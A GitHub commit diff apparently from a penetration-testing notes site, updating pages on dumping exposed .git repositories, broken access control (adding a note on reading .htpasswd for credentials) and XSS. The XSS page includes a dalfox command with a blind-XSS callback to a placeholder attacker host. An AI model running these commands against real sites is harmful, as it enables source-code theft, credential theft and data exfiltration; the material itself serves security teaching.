Skip to content

Commit f3c2ba3

Browse files
committed
updated XSS and others
1 parent ceba022 commit f3c2ba3

File tree

3 files changed

+25
-17
lines changed

3 files changed

+25
-17
lines changed

src/exploit/web/dump-git-repository-from-website.md

Lines changed: 13 additions & 13 deletions
Original file line numberDiff line numberDiff line change
@@ -4,11 +4,22 @@ description: If we can have permission to access git repositoy in target website
44
tags:
55
- Web
66
refs:
7-
date: 2023-07-06
7+
date: 2025-02-27
88
draft: false
99
---
1010

11-
## Dumping
11+
## Dumping with Git-Dumper
12+
13+
[git-dumper](https://github.com/arthaud/git-dumper) is an useful Python package.
14+
15+
```bash
16+
pipx install git-dumper
17+
git-dumper https://example.com/.git ./dumped
18+
```
19+
20+
<br />
21+
22+
## Dumping with Wget
1223

1324
We can simply use **`wget`** command in Linux to download the git repository.
1425
After that, we can investigate files or all histories.
@@ -45,14 +56,3 @@ chmod +x extractor.sh
4556

4657
Now we retrieve the entire git project from website.
4758
It is stored in **“./new_example”** folder. We can investigate the repository.
48-
49-
<br />
50-
51-
## Dumping with Git-Dumper
52-
53-
[git-dumper](https://github.com/arthaud/git-dumper) is an useful Python package.
54-
55-
```bash
56-
pip install git-dumper
57-
git-dumper https://example.com/.git ./dumped
58-
```

src/exploit/web/security-risk/broken-access-control.md

Lines changed: 9 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -4,7 +4,7 @@ description: The attacking methodology of broken access control in web applicati
44
tags:
55
- Web
66
refs:
7-
date: 2024-12-06
7+
date: 2025-02-27
88
draft: false
99
---
1010

@@ -137,4 +137,11 @@ If there is another website that is owned by same orginazation, we may be able t
137137

138138
```bash
139139
https://example.com?url=https://admin.example.com/
140-
```
140+
```
141+
142+
<br />
143+
144+
## Read `.htpasswd`
145+
146+
If the target website is protected with **Authorization (WWW-Authenticate)**, we may be able to get credentials by reading `.htpasswd` file in the web root.
147+

src/exploit/web/security-risk/xss.md

Lines changed: 3 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -11,7 +11,7 @@ refs:
1111
- https://cheatsheetseries.owasp.org/cheatsheets/XSS_Filter_Evasion_Cheat_Sheet.html
1212
- https://brutelogic.com.br/blog/building-xss-polyglots/
1313
- https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot
14-
date: 2024-12-06
14+
date: 2025-02-27
1515
draft: false
1616
---
1717

@@ -25,7 +25,8 @@ draft: false
2525

2626
# -X: Method
2727
# --data: POST data
28-
dalfox url https://example.com/contact -X POST --data "email=test&message=test" -b http://<attack-ip>:<attack-port>
28+
# -p: Specific parameter
29+
dalfox url https://example.com/contact -X POST --data "email=test&message=test" -p message -b http://<attack-ip>:<attack-port>
2930
```
3031

3132
- [XSStrike](https://github.com/s0md3v/XSStrike)

0 commit comments

Comments
 (0)